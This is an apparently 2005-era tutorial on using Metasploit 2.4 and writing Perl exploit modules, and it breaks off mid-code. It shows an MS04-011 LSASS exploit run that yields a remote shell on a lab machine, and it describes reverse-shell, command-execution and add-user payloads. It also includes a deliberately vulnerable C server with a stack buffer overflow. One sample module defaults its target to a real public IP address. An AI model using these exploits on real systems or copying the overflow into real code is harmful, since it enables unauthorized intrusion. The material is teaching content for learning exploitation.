Lets understand the Metasploit framework by first downloading the file
http://www.metasploit.com/tools/framework-2.4.exe. Installing this program creates lots of sub directories under program files.
This product is used to test whether someone else can take over our computers. We are running Windows 2000 and what follows is a short tutorial on how to use this product. We click on Start, Programs, Metasploit Framework, MSf Console. This is a program that runs in a dos box. This is the screen that we see.
+ -- --=[ msfconsole v2.4 [79 exploits - 75 payloads]
msf >
At this prompt we write show exploits to see a list of exploits that come bundled with the product. We teach you how to write your own exploit. Show payloads will display a list of payloads bundled with the product. The exploit lsass_ms04_011 works well with Windows 2000. We then use this exploit by writing use lsass_ms04_011 and the prompt changes for us. To run a exploit we write the command exploit.
msf lsass_ms04_011 > exploit
[*] This exploit requires a valid payload to be specified first.
We get an error as we have not specified a payload to be executed on our target machine. Thus we have to set the PAYLOAD variable by specifying the set command as
msf lsass_ms04_011 > set PAYLOAD win32_bind
PAYLOAD -> win32_bind
The win32_bind is the simplest payload that we can use. This payload simply opens up a dos box on the machine we are running the exploit but the input and output is redirected from the other machine. This means that if we do a dir in the dos box it will happen on the other machine not ours.
msf lsass_ms04_011(win32_bind) > exploit
Error: Missing required option: RHOST
We again write exploit and we get another error. Thus it is better to use the show options to find out what options the exploit and payload require.
msf lsass_ms04_011(win32_bind) > show options
Exploit and Payload Options
===========================
Exploit: Name Default Description
-------- ------ ------- ------------------
required RHOST The target address
required RPORT 139 The target port
Payload: Name Default Description
-------- -------- ------- -----------------------------------------
required EXITFUNC thread Exit technique: "process", "thread", "seh
required LPORT 4444 Listening port for bind shell
Target: Automatic
This outputs tells us that the lsass exploit will target port 139 and the RHOST variable is the IP address of the target host that we have to specify. Thus we use the set command once again.
msf lsass_ms04_011(win32_bind) > set RHOST 70.0.0.2
RHOST -> 70.0.0.2
Now when we exploit the target we are in a dos shell as.
msf lsass_ms04_011(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Detected a Windows 2000 target (MACH2)
[*] Sending 8 DCE request fragments...
[*] Sending the final DCE fragment
[*] Got connection from 70.0.0.10:1134 <-> 70.0.0.2:4444
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
This is how we can take over some other machine. Exit takes us out of the dos box. The win32_reverse shell allows the other side to make the connection. This requires our IP address and thus we have to use set LHOST 70.0.0.10 to make the connect. The win32_exec allows us to run a program on the other machine. The name of the program is specified by the CMD variable. Finally to create a new user on the other machine we use the win32_adduser payload. The user and pass variables contain the user name and password. The setg command shows us all the global variables defined. What we do is use setg like set. When we write setg PAYLOAD win32_exec, it creates a global variable PAYLOAD. Using the command save, it save it to a file. This allows the framework to remember variables each time we load the console. The unsetg command removes the variable. There is also a web interface to what we have done. When we run the program MSFWeb it creates a server on 127.0.0.1 port 55555. When we run a browser with the url
http://127.0.0.1:55555 we are given a browser interface to the framework.
We move to the directory
"C:\Program Files\Metasploit Framework\home\framework\exploits". Here we create a file zzz.pm and place no code in it at all. The .pm extension tells us that it what we are about to write is a perl program.
Zzz.pm
We then click on Start, Metasploit Framework, MSF Console. This is the command line shell to run exploits with Metasploit. The usage of Metasploit is specified in our earlier tutorial. When we run program msfconsole, it first looks into the exploits directory for all files with an extension pm. These files are supposed to carry exploits. The first line of any perl module should start with the name of the module using the package keyword. A perl module is nothing but code that can be called by other. We did not and thus msfconsole complained that it could not figure out the package name for zzz.pm. The program also tells us that we are using version 2.4 and that our copy comes with 75 exploits and 75 payloads.
Zzz.pm
package Msf::Exploit::zzz;
The name of the package is zzz, the same name as the name of the pm file. Also the Msf::Exploit namespace will be explained later. A lot of what we do is to make sure that you understand the code written by the Metasploit team. Thus variable names etc will be chosen as per what we see in the source code. For example the Metasploit team uses a variable called self, so will we. Thus a lot of our code looks and feels like Metasploit as we have learnt from looking at their code. What we forgot to tell you is that all lines of perl code like C end in a semi colon. We will also explain perl programming along the way.
We close msfconsole and start it again, now the package error goes away and we get another error, cannot locate object method new. In perl methods are called subs or sub routines. The Metasploit framework wants to find a method called new and we do not have one. The function new is like the constructor of a class. In Metasploit all initialization code will be place here.
package Msf::Exploit::zzz;
sub new
{
}
We created the method new using the keyword new and now we get some vague error that we cannot fathom. Always close the msfconsole and re run or else the changes will not get reflected.
package Msf::Exploit::zzz;
sub new
{
print "In new\n";
}
In new
We add a new function print that behaves just like a printf, its prints to the console. . As the function new gets first called, the words In new gets displayed on the console.
package Msf::Exploit::zzz;
sub new
{
print "In new @_\n";
}
In new Msf::Exploit::zzz
This function new gets called with some parameters. The variable @_ gives us access to these parameters. By displaying @_ we are displaying all the parameters passed to us. In our case the parameter value is the name of our module zzz. Any variable beginning with @ is an array and beginning with $ is a simple variable.
package Msf::Exploit::zzz;
sub new
{
print "In new @_\n";
$class = shift;
print "class value is $class\n";
}
In new Msf::Exploit::zzz
class value is Msf::Exploit::zzz
We use the shift keyword to place the first parameter passed to the function new into the variable class. The list of parameters now contain one less entity. In perl whenever we see a dollar sign we know that what follows is a variable. Thus $class gets the value of the module name zzz which we print in the next line. In perl variables do not have a data type like int, char. They are distinguished by the nature of data, $ stands for simple variables, @ for an array etc.
package Msf::Exploit::zzz;
sub new
{
print "In new @_\n";
$class = shift;
print "class value is $class\n";
print "In new @_\n";
}
In new Msf::Exploit::zzz
class value is Msf::Exploit::zzz
In new
Just proving a point. The variable @_ first contained a single value zzz, after shift the value it contains is null or blank. The variable class is a name used extensively by Metasploit. The error does not go away so lets add more code.
package Msf::Exploit::zzz;
use base "Msf::Exploit";
sub new
{
$class = shift;
$self = $class->SUPER::new({'Info' => $info});
return ($self);
}
+ -- --=[ msfconsole v2.4 [77 exploits - 75 payloads]
By adding the above lines of code we breathed a sigh of relief. Finally the system understood us as an exploit and allowed us entry by add increasing the number of exploits by 1 from 75 to 76. If we are moving too fats for your linking read the perl tutorial we have written on our web site at url
http://www.vijaymukhi.com/documents/tutorials/perl.html. The syntax SUPER::new is a way of calling the base class new. The module zzz that wrote will soon be used by some other code. To activate our module, that user has to use the use keyword with the name of the namespace. This would be use zzz. If the module was defined with a namespace, the name of the namespace follows. Thus use base allows us to use a perl module called base with the namespace Msf::Exploit. Return does what all returns do, return a value back to whoever calls it. We are returning whatever the base class new returns.
msf > show exploits
Metasploit Framework Loaded Exploits
wsftp_server_503_mkd WS-FTP Server 5.03 MKD Overflow
zzz No Name
Now that we have the msfconsole prompt we write the commands show exploits. We get a large list of exploits and the last name is ours zzz, but without a name.
package Msf::Exploit::zzz;
use base "Msf::Exploit";
$info = {
'Name' => 'vijay and Sonal Mukhi'
};
sub new
{
$class = shift;
$self = $class->SUPER::new({'Info' => $info});
return ($self);
}
zzz vijay and Sonal Mukhi
The function new of the base class is passed one variable called Info whose value is $info. When we call function in perl the order of parameters is not important. Thus each parameter is send by name. This allows us to specify parameters in any order, but now we need to remember their names. Thus we are calling the new function with a single parameter $info but this value is bound to the parameter name Info. The => is part of perl syntax. We now create the variable info. This also uses the same syntax like before. We have only one string value associated with the name Name. The system when it displays all the exploit names, it uses the name variable for the description to be displayed. The name of the array can be whatever we want. We made it info1 and everything worked as advertised.
$info1 = {
'Name' => 'vijay and Sonal Mukhi'
};
$self = $class->SUPER::new({'Info' => $info1});
$self = $class->SUPER::new({'Info1' => $info});
but if we change the name of the parameter to Info1, we get No Name as the answer. This is because we send a parameter bound to the Info1 variable, new wanted it bound to the Info variable.
$info = {
'Name' => 'vijay and Sonal Mukhi',
'UserOpts' => {
'RHOSTS' => [ 0 , 'ADDR' , 'The target address is', '207.46.199.30'],
'RPORT' => [ 1 , 'PORT' , 'Port Number is ', 80]
}
};
msf > use zzz
msf zzz > show options
Exploit Options
Exploit: Name Default Description
-------- ------ ------------- ---------------------
optional RHOSTS 207.46.199.30 The target address is
required RPORT 80 Port Number is
Target: Targetless Exploit
We now add one more variable UseOpts. Multiple variables are separated by commas within square brackets. This rule applies at every level. The UserOpts variable is also made up of multiple variables. Thus we start with the square brackets denoting multiple, and then create the individual variables separated by commas. We create two sub variables, RHOSTS and RPORTS. Most exploits need the address and port number of the host they want to exploit and these variables names are always used. As these variables will have multiple values we use the square brackets to define them. The first is a number 0 means value is optional , 1 means the user must specify it or else the exploit will not run. How we specify values to our options is another story. The next value is what we call the data type of the variable. Then a description of the variable and finally the default value. For the rhost variable we have specified the IP address of Microsoft in single inverted commas and for port number 80, the http port. To use an exploit we first activate it by using the use zzz command. We then run the command show options to give us a list of options. We see our two names, whether the options are optional or required, the default values and finally the Description. All this because we passed this data in our variable to the new function. The only thing left is that the system complains that we have no targets. Lets set it right.
$info = {
'Name' => 'vijay and Sonal Mukhi',
'UserOpts' => {
'RHOSTS' => [ 0 , 'ADDR' , 'The target address is', '207.46.199.30'],
'RPORT' => [ 1 , 'PORT' , 'Port Number is ', 80]
},
'Targets' =>
[
['Windows 2000 SP3'],['Windows 2000 SP4'],['Windows 2000 SP5']
],
'DefaultTarget' => 1
};
msf zzz > show options
Exploit Options
===============
Exploit: Name Default Description
-------- ------ ------------- ---------------------
optional RHOSTS 207.46.199.30 The target address is
required RPORT 80 Port Number is
Target: Windows 2000 SP4
msf zzz > show targets
Supported Exploit Targets
0 Windows 2000 SP3
1 Windows 2000 SP4
2 Windows 2000 SP5
msf zzz >
We create a third variable targets which contains multiple values and no sub values like UserOpts. Thus we use [] brackets to separate the multiple values. These values in turn can have multiple values and thus another set of []. As of now we have a single values, later on we can have multiple values. The values are the names of the targets that we have tested our exploit on. The reason we want each target to have multiple values is because depends on the type of OS version and service pack, dll’s are loaded at different memory locations. We can specify these addresses along with the name of the target. This is not enough and we now add one more variable DefaultTarget to specify which target should be used. In our case as we set the value of the variable to 1, the command show options shows us SP4 the second target. We then run the command show targets which displays all the targets. In msfconsole we do not have to key in the entire word, tab completion like linux fills up the rest of the word. Thus we do not type in exploit, exp plus tab completes it for us.
sub new
{
$class = shift;
$self = $class->SUPER::new({'Info' => $info});
return ($self);
}
sub Exploit
{
print ("In exploit\n");
}
msf > use zzz
msf zzz > exploit
In exploit
Lets now actually run an exploit. Our exploit will simply fetch a page from a web site. We first create a function or sub Exploit. Note that in perl case matters a lot. In msfconsole we first use our exploit and then run the command exploit. This simply calls the function Exploit. Thus whatever code we write in Exploit gets called.
print ("In exploit @_\n");
In exploit Msf::Exploit::zzz=HASH(0x10bfeab0)
The function Exploit also is passed the name of the module.
sub Exploit
{
print ("In exploit \n");
$self = shift;
$target = $self->GetVar("RHOSTS");
$port = $self->GetVar("RPORT");
$target_idx = $self->GetVar("TARGET");
$self->PrintLine("Starting Exploit on $target $port $target_idx");
}
msf zzz > exploit
In exploit
Starting Exploit on 207.46.199.30 80 1
We first set the variable self to the name of the module passes. We would first like to know what the values of the various options the user has chosen. We have a function GetVar which is passed the name of the variable and returns us the value. We thus get the values of the host and port number in target and port. The target_idx variable contains the target variable value. This is 1 as we did not change it.
sub Exploit
{
print ("In exploit \n");
$self = shift;
$target = $self->GetVar("RHOSTS");
$s = Msf::Socket::Tcp->new('PeerAddr' => $target, 'PeerPort' => 80);
if ( $s->IsError)
{
$self->PrintLine('[*] Error creating socket:' . $s->GetError());
return;
}
print "Socket Call OK\n";
}
msf zzz > exploit
In exploit
Socket Call OK
Now we are doing something really useful. The idea of writing a exploit using Metasploit is that it make life simpler for all of us. The framework offers us a class Tcp that handles the Tcp protocol for us. W simply call the new sub with two parameters, the PeerAddr with the targets address and the PeerPort with the port number. We set the PeerAddr parameter to the $target variable which contains a dynamic Ip address and hard code the port number to 80. We then create an instance of this class by calling new. This class creates a connection to the target. The s variable is a socket or handle to the connection. If in error the system sets the IsError member of the socket object to true. This calls our If statement that prints out an error message. His code always calls the PrintLine function off self. Also his code likes displaying a star in []. The GetError function tells us in English why the socket object could not connect to the target. The return keyword stops our exploit if the socket call failed.
sub Exploit
{
print ("In exploit \n");
$self = shift;
$target = $self->GetVar("RHOSTS");
$s = Msf::Socket::Tcp->new('PeerAddr' => $target, 'PeerPort' => 80);
if ( $s->IsError)
{
$self->PrintLine('[*] Error creating socket:' . $s->GetError());
return;
}
print "Socket Call OK\n";
$request = "GET / HTTP/1.0\r\n\r\n";
$s->Send($request);
$a = $s->Recv(-1,1);
print $a;
}
Socket Call OK
HTTP/1.1 200 OK
Connection: close
Date: Tue, 07 Jun 2005 06:40:32 GMT
Server: Microsoft-IIS/6.0
We then set a variable request to the string Get / using the http protocol 1.0. We then use the Send function of the socket class to send the string over. The receive function receives the packets that come from the server and stores it in a. We then print a out which shows us some part of the web page. This is how we can write an exploit that does networking.
When we first started working with Metasploit the problem we had was perl. We believed that most people do not know perl and hence lets take a small break and start learning perl before writing exploits. The problem with learning perl is that it can take a lifetime and hence we went through the code already present in the exploits directory and tried to make sense off it. Thus what follows is a step by step explanation of perl code used in the exploits. The next thing we did was copy all the pm files in the exploits directory to another blank directory and then deleted all the pm files. We also moved into the payloads directory which is at the same level as exploits under framework. We once again copied all pm files into another directory and deleted all but three files, win32_bind.pm, win32_reverse.pm and win32_adduser.pm. We do this as each time we start the console, the extra time it takes to read all exploits and payloads would now not take place. We hate waiting for the msfconsole to start. We write our smallest exploit as z.pm
z.pm
package Msf::Exploit::z;
use base "Msf::Exploit";
sub new
{
$class = shift;
$self = $class->SUPER::new();
}
sub Exploit
{
}
+ -- --=[ msfconsole v2.4 [1 exploits - 3 payloads]
The new method does not have to return a value, the last command output is the return value. Thus the value of the variable self is returned. We have to use the namespace Msf::Exploit before the name z. All exploits have to have this prefix. The new method does not have to return the name of the info variable. We will write all our code in Exploit which will explain the workings of perl.
sub Exploit
{
print "hi" ." bye" ;
}
hi bye
perl allows us to use the . to concatenate strings. Thus the hi and bye gets joined together. Normally we see a lot of perl code in the exploits as.
sub Exploit
{
$r = "hi" ." bye" ;
$r .= " No";
print $r;
}
hi bye No
We have to send our exploit over. We create a variable r in which we concatenate bits of our payload. The .= is like += in C.
sub Exploit
{
$r = "hi " ;
$r .= "\x41B\x43D";
print $r;
}
hi ABCD
ASCII is not the best bet for creating exploits. We would like to place actual bytes into our payload. Thus we use a \ followed by the x and the actual hex value. We can mix and match the hex values with ascii.
sub Exploit
{
$r = "hi " ;
$r .= "AB" x 4;
print $r;
}
hi ABABABAB
Lots of times we have to repeat a certain sequence of bytes. We use the x operator to repeat the last entity. Thus AB gets repeated four times.
sub Exploit
{
$r = "hi " ;
$r .= "AB" x 4;
print $r x 3;
}
hi ABABABABhi ABABABABhi ABABABAB
The x simply repeats the last command as many times as we ask it to. One valid use is when we want to create a nop sledge. Here we want to repeat a certain sequence of bytes a large number of times.
sub Exploit
{
print "hi";
}
sub Exploit
{
print "hi1";
}
msf > use z
msf z > exploit
hi
msf z > exploit
hi
msf z > reload
msf z > exploit
hi1
We first use our exploit z and then run it, it displays hi, We then change the hi to hi1 and run the exploit. The system shows us hi and not hi1. Earlier we simply closed and then re ran the console. Here we run the command reload and all the code in z.pm gets reloaded. We now run exploit and we see hi1 and not hi. In future no point in closing and re running the msfconsole. As we proceed in the tutorial we will keep bringing up newer features, but one at a time.
package Msf::Exploit::z;
use base "Msf::Exploit";
use strict;
sub new
{
$class = shift;
$self = $class->SUPER::new();
}
sub new
{
my $class = shift;
my $self = $class->SUPER::new();
}
The first z.pm gives use us lots of errors. This is because we have added the use strict option. This tells perl to be a lot more strict with us. Thus all our variables that we create like class and self have to be prefaced with the keyword my or else an error results. All the exploit code found in the Metasploit exploits use the use strict option and thus we see a large number of my’s around.
package Msf::Exploit::z;
use base "Msf::Exploit";
$info =
{
'Targets' =>
[
['IA WebMail 3.x', 1036],
['Vijay Mukhi', 2000]
]
};
sub new
{
$class = shift;
$self = $class->SUPER::new({'Info' => $info});
}
sub Exploit
{
$self = shift;
$idx = $self->GetVar('TARGET');
print $idx . "\n" ;
}
msf z > reload
msf z > exploit
[*] Exploit does not default targets, one must be specified.
msf z > set TARGET 1
TARGET -> 1
msf z > exploit
1
We come back to the good old targets array and as before send the $info array across. When we run the exploit command we get an error as we have multiple targets but we have not selected a target. We use the set command to set the target variable to 1. Here if we write out the target variable in lower case, we get a warning. When we now run the exploit, the idx variable whose value is stored in the TARGET variable is 1.
sub Exploit
{
$self = shift;
$idx = $self->GetVar('TARGET');
print $idx . "\n" ;
@targets = @{$self->Targets};
print $targets[0]->[0] . "\n" ;
print @targets[1]->[0] . "\n" ;
print @ targets[1]->[1] . "\n" ;
}
1
IA WebMail 3.x
Vijay Mukhi
2000
Any variable starting with @ is an array and hence self->Targets gives us access to our array called Targets. This array is actually an array within an array and hence we the notation targets->0 will access the first array, the ->[0] the first member. Thus targets[1]->[1] will access the second member of the second array. Perl is very accommodating here and whether we use a $ or a @ it does not care. Also the variable @targets could be written as $targets. The only time it gets confused is if we write ${self->Targets} instead of @. This is how we can access any member of the array.
msf z > setg
AlternateExit: 2
DebugLevel: 0
Encoder: Msf::Encoder::PexFnstenvMov
Logging: 0
Nop: Msf::Nop::Pex
RandomNops: 1
We get tired of setting the variables all the time. Using the command setg we can set a variable once and for all.
msf z > setg TARGET 1
TARGET -> 1
msf z > setg
RandomNops: 1
TARGET: 1
The setg command has the same syntax as set but set is only valid for the current session. To make the save permanent we have to use the save command.
msf z > save
Saved configuration to: /home/.msf/config
msf z >
Save saves it to a file config so that we can use it later. Restart msfconsole and we can see the TARGET variable yet defined. This is how we can save time by not specifying the same variables over and over again.
The other values along with the target variable name are some values which depend upon the product or OS version. For example kernel32 starts at different memory locations on different service packs. We can place these values as part of the array. Different products may have a different offset for the buffer overflow depending upon the version. The user does not have to know these values, he chooses the target, the system does the rest. Thus values that change version to version, service pack to service pack, do not have to hard coded in the code but placed in the Targets array.
Now that we have set the target variable, we now remove the Targets array. When we run the command exploit we get an error as we have a TARGET variable defined and no such array in our code.
msf > use z
msf z > exploit
[*] Invalid target specified.
We get the above error and now the only option is to un define the TARGET variable. The unsetg command does what we want.
msf z > unsetg TARGET
sub Exploit
{
print "hi\n";
sleep(5);
print "Bye\n";
}
The sleep function does what it advertises, it sleeps for some time. The time is normally in seconds and one and a half times of what we specified. This function is used to ask us to wait for some time while the exploit is going on.
sub Exploit
{
$r = "Hello";
print length($r);
}
5
The length function returns the length of the string passed. There is no concept of null terminated strings as we have in C.
package Msf::Exploit::z;
use base "Msf::Exploit";
$info =
{
'Name' => 'This is the name of the exploit',
'Version' => '$Revision: 1.22 $',
'Authors' => [ 'Vijay and Sonal', ],
'Arch' => [ 'x86' , SPARC ],
'OS' => [ 'win32', 'win2000' , 'linus' ],
'Priv' => 0,
' UserOpts' => {
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 80],
},
'Description' => Pex::Text::Freeform (qq{
This is a nice way of formatting text.
The line breaks comes the way we like.
}),
'Refs' => [
['OSVDB', 2757],
['URL', '
http://www.k-otik.net/exploits/11.19.iawebmail.pl.php'],
],
' DefaultTarget ' => 0,
'Targets' =>
[
['IA WebMail 3.x', 1036],
['Vijay Mukhi', 2000]
],
'Keys' => ['mukhi']
};
sub new
{
$class = shift;
$self = $class->SUPER::new({'Info' => $info});
}
sub Exploit
{
}
msf > info z
Name: This is the name of the exploit
Class: remote
Version: $Revision: 1.22 $
Target OS: win32, win2000, linus
Keywords: mukhi
Privileged: No
Provided By:
Vijay and Sonal
Available Targets:
IA WebMail 3.x
Vijay Mukhi
Available Options:
Exploit: Name Default Description
-------- ------ ------- ------------------
required RHOST The target address
required RPORT 80 The target port
Description:
This is a nice way of formatting text. The line breaks comes the
way we like.
References:
http://www.osvdb.org/2757 http://www.k-otik.net/exploits/11.19.iawebmail.pl.php This one just to show you the use of all the members of the Info array. The command info z will show us a list of what information about our exploit is displayed for the user. The Name field is used as the first line of display. The Version is a carbon copy of our version field. The Target OS is the list of OS’s our exploit runs. This is taken from the OS field. There is no error checking done as we know of no OS called linus. The Arch field is not used by info but used later by the web interface. The Keys keyword is the input to the Keywords field and the Priv field tells us whether the exploit should run as root. Our value is 0 and hence info displays it is No, change it to 1 and the No becomes yes. The Authors becomes the Provided by and the Targets Available Targets:. The UserOpts becomes Available Options: which we explained earlier and the Description becomes Descriptions. We are using the Freeform function from the Pex::Text namespace. We writing our description on two lines. It comes on the same line in the output. Finally the refs become References:, where we can read more about the exploit. Every exploit written by the Metasploit has all these variables defined and they cam be safely ignored. The DefaultTarget does not show in the info output.
package Msf::Exploit::z;
use base "Msf::Exploit";
$info =
{
'Payload' => { 'Space' => 1024 }
};
sub new
{
$class = shift;
$self = $class->SUPER::new({'Info' => $info});
}
sub Exploit
{
}
msf z > exploit
[*] This exploit requires a valid payload to be specified first.
The beauty of the Metasploit world is that it allows us to specify a payload that can be send across with our exploit. We start with using the Payload variable with one value space that gives us the size of the payload. When we run the command exploit, we get an error as we have not specified which payload to use.
msf z > setg PAYLOAD win32_bind
PAYLOAD -> win32_bind
msf z > save
Saved configuration to: /home/.msf/config
msf z > exploit
[*] Starting Bind Handler.
[*] Exiting Bind Handler.
We use setg and not set as we want the payload to be saved for ever. No point keying it in all the time. When we run the exploit command it starts the Bind Handler and then exits it. This handler is the guy that creates our payload. Setting the payload changes the prompt adding the name of the payload.
sub Exploit
{
$self= shift;
$shellcode = $self->GetVar('EncodedPayload')->Payload;
print $shellcode;
}
Like the RHOST variable we have the EncodedPayload variable. This in turn has a Payload member that contains the payload. When we print it out we get the contents of the win32_bind payload.
msf z(win32_bind) > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf z(win32_reverse) > exploit
Error: Missing required option: LHOST
msf z(win32_reverse) > show options
Exploit and Payload Options
Exploit: Name Default Description
Payload: Name Default Description
required EXITFUNC seh Exit technique: "process", "thread", "seh"
required LHOST Local address to receive connection
required LPORT 4321 Local port to receive connection
Target: Targetless Exploit
We now change the PAYLOAD using the set command to win32_reverse. We get an error as this payload requires a LHOST variable. This is the IP address of the machine that the victim will connect back to. This is normally the machine that runs the exploit. Thus payloads can have their own parameters.
msf z(win32_reverse) > set LHOST 127.0.0.1
LHOST -> 127.0.0.1
msf z(win32_reverse) > exploit
We set the LHOST variable and now the exploit gives us another set of values. This is how we can tag on a payload to our exploit. Before continuing it is a good idea to unsetg all the variables that we have created so far.
package Msf::Exploit::z;
use base "Msf::Exploit";
$info =
{
};
sub new
{
$class = shift;
$self = $class->SUPER::new({'Info' => $info});
}
msf z > check
[*] No check has been implemented for this module
Smallest program. Every exploit should have at least two functions, Exploit that gets called when we run the command Exploit and Check when we run the Check command. We get an error as we do not have a Check sub.
sub Check
{
print "In Check\n";
}
msf z > check
In Check
In the check function we are supposed to check whether the exploit can be run or not on the target machine. Thus we must first allow the user to run check where we should check whether the IP address of the target contains an environment that we can compromise. For example there is no point running a Unix exploit on a IP address running windows.
sub Check
{
$versionNum = $self->GetVersion('127.0.0.1', 80);
print $versionNum . "\n";
}
sub GetVersion
{
$a = shift;
$b = shift;
$c = shift;
print "$a, $b , $c" . "\n";
return 22;
}
msf z > check
Msf::Exploit::z=HASH(0x108ac9cc), 127.0.0.1 , 80
22
In the check function we call a sub that we have created GetVersion using the self variable. This is how we call entities that we have created within our exploit. We pass two parameters to our function GetVersion but as always perl functions do not take explicit parameters. We keep using shift to store the parameters into different variables. Thus $a gets the handle to our exploit, $b the 127.0.0.1 and $c the last parameter 80. The return value 22 gets stored in the versionNum variable. This is how we can accept and return values.
sub Check
{
$a = 'vijay';
if ($a =~ /^vijay$/)
{
print "String contains vijay\n";
}
if ($a =~ /^vijay1$/)
{
print "String contains vijay1\n";
}
}
msf z > check
String contains vijay
One of the strongest points of perl is that it has wonderful string operators. We set $a to vijay and then compare it with vijay. The // encompass the string, the ^ means start of string and $ means the end of string. Thus in the first case a match is made as our string contains vijay, In the second case we are checking for vijay1 which is not present in $a.
sub Check
{
$a = 'vijay mukhi';
if ($a =~ /vijay/)
{
print "String contains vijay\n";
}
$a = 'vijay mukhi';
if ($a =~ /^vijay$/)
{
print "String contains vijay\n";
}
}
msf z > check
String contains vijay
In the next case we remove the ^ and $ from the first so it matches as there is vijay in the string $a. However the second one does not match as we are checking for a exact match vijay. If we remove the $ from the second condition the strings will match as the $a string starts with vijay.
sub Check
{
$a = "\\vijay\\\n";
print $a;
}
msf z > check
\vijay\
Whenever we want to send a single \ over we have to send two \\ over. This is because for the “” the backslash is a reserved character.
package Msf::Exploit::z;
use base "Msf::Exploit";
$info =
{
};
$advanced = {
'SizeOfFragment' => [100,'Size of Fragments']
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced});
return($self);
}
sub Check
{
$self = shift;
$a = $self->GetVar('SizeOfFragment');
print $a . "\n";
}
msf z > show advanced
Exploit Options
Exploit (Msf::Exploit::z):
--------------------------
Name: SizeOfFragment
Default: 100
Size of Fragments
msf z > check
100
The metasploit framework defines two types of options, basic or Info and advanced. The new method is actually called with two arrays, a Info array and an Advanced array. The idea of options is to customize the exploit. What the designers had in mind was that basic option should be placed in the Info array and the more advanced in the Advanced array. Thus the advanced array has the just the value and the string to be displayed. When we execute show advanced we get only the advanced options. Here we see the Name, a value and the help label. In our check function we use the same GetLocal to give us the single value and not an array so that we could access the label. There is no other difference between advanced and info. Info has lots of other members, advanced only the variables. The same set command sets the value of the variables. To sum it up, options that a normal user would not use place them in the advanced array.
package Msf::Exploit::z;
use base "Msf::Exploit";
$info =
{
'Targets' => [
['Windows 2000 sp 1', 10],
['Windows 2000 sp 4', 12]
]
};
$advanced =
{
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced});
return($self);
}
sub Check
{
$self = shift;
$target_idx = $self->GetVar('TARGET');
$target = $self->Targets->[$target_idx];
$self->PrintLine(sprintf("We are targeting %s at %04x\n",$target->[0], $target->[1]));
}
msf z > show targets
Supported Exploit Targets
0 Windows 2000 sp 1
1 Windows 2000 sp 4
msf z > set TARGET 1
TARGET -> 1
msf z > check
We are targeting Windows 2000 sp 4 at 000c
We start with creating our good old Targets array keeping in mind that we have an array of arrays and hence we need the [] brackets. The show targets command show us our two targets. We then set the target variable to 1 and when we run check, the target_idx member gets set to 1. The target variable becomes the entire second array as Targets represents the array, the [1] gives us access to the first member. Whenever we see target->[0] we can access the first member and so on. This is done a little while ago but we just wanted to refresh your memory. We are now printing the two values in the array to tell the user what we are up to. The only problem is that we would like to print the second value 12 as a hex digit in a width of 4 .Here is where we use the sprintf function that has the same syntax as sprintf of C. We use %04x where the 0 denotes padding of zeros if the width is not 4. This is how we can format our output. The above line is a standard in all exploits that tell the user what is going on, on which targets.
package Msf::Exploit::z;
use base "Msf::Exploit";
$info =
{
};
$advanced =
{
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced});
return($self);
}
sub Check
{
$self = shift;
$self->aaa(1,2,3);
}
sub aaa
{
shift;
($a, $b , $c ) = @_;
print("$a $b $c\n");
}
msf z > check
1 2 3
It really takes a long time to learn perl. Here we have a sub aaa that gets called with 3 parameters. In the sub we get 4 parameters and the first shift throws away the handle to the module. The last program used multiple shifts to handle the parameters. Experienced perl programmers would scoff at such code. Thus we need a better way that would impress the pros. The @_ variable has the entire array stored in in and because we have 3 variables on the left they get set with the three parameters. Remove the brackets and all hell breaks loose. This is how in a single line we can store the entire set of parameters.
sub Check
{
$a = 'Vijay';
$b = substr($a, 1, 3);
print $b . "\n";
}
msf z > check
ija
All environments all over the world offer us a substr function that gives us part of a string. This function wants the string as the first parameter $a, the starting point in the string as the second 1 and the length of the string. Thus we get the three bytes starting from I as counting starts from 0 and not 1. The string ija is stored in variable $b.
package Msf::Exploit::z;
use base "Msf::Exploit";
$info =
{
'UserOpts' =>
{
'RPORT' => [1, 'PORT', 'The target port', 41523],
}
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info});
return($self);
}
sub Exploit
{
$self = shift;
return if $self->GetVar('RPORT') != 80 ;
print "hi\n";
}
msf > use z
msf z > exploit
msf z > set RPORT 80
RPORT -> 80
msf z > exploit
hi
We create a user variable RPORT and set it to a very large value. We then place a conditional return statement that only acts a return if the variable RPORT has a value other than 80. Thus initially the value is 41523 and hence we get no output. Using the set command to set its value to 80 displays hi. We use the return if whenever we want to quit out of our code if a certain condition is not met with.
After learning all about perl and the Metasploit framework we will now start writing our own exploits with it. There are many operating systems today in use with myriad service packs. Thus there is a very small probability that the exploit and vulnerability that we use will be the same that you have access to. Thus lets us now create a server that has a buffer overflow and lets write an exploit that will overflow that buffer. On our website we have a tutorial on buffer overflow so we request you to read that first. For some reason thanks to the winpcap driver that we all use, the same machine cannot be used for both exploit and vulnerability. We cannot use localhost any more. Thus we connect two computers today, the one we work on is IP address 70.0.0.10 and the other one 70.0.0.2. We run the server on our machine 70.0.0.10. Let us explain the server program first.
Server.c
#include
SOCKET s,s1;
struct sockaddr_in A,A1;
int d ;
WSADATA ws;
int main()
{
char buf[8];
WSAStartup(0x202,&ws);
s = socket(AF_INET, SOCK_STREAM, 0);
printf("s=%d\n",s);
A.sin_family = AF_INET;
A.sin_port = htons(2000);
A.sin_addr.s_addr = INADDR_ANY;
d = bind(s, (struct sockaddr *)&A, sizeof(A));
printf("d=%d\n");
listen(s, 5);
d = sizeof(A1);
s1 = accept(s, &A1, &d);
printf("s1=%d\n",s1);
recv(s1, buf, 4096,0);
}
This is a simple server that binds to port 2000 and accepts any IP address. The recv function accepts up to 4096 bytes of data in an array buf. The only problem is that our buf array is 8 bytes long. This is how we will over flow buf using our client program.
Client.c
#include
SOCKET s;
struct sockaddr_in A;
int d ;
WSADATA ws;
char aa[1000];
int main()
{
WSAStartup(0x202,&ws);
s = socket(AF_INET, SOCK_STREAM, 0);
printf("s=%d\n",s);
A.sin_family = AF_INET;
A.sin_port = htons(2000);
A.sin_addr.s_addr = inet_addr("70.0.0.10");
connect(s, &A, sizeof(A));
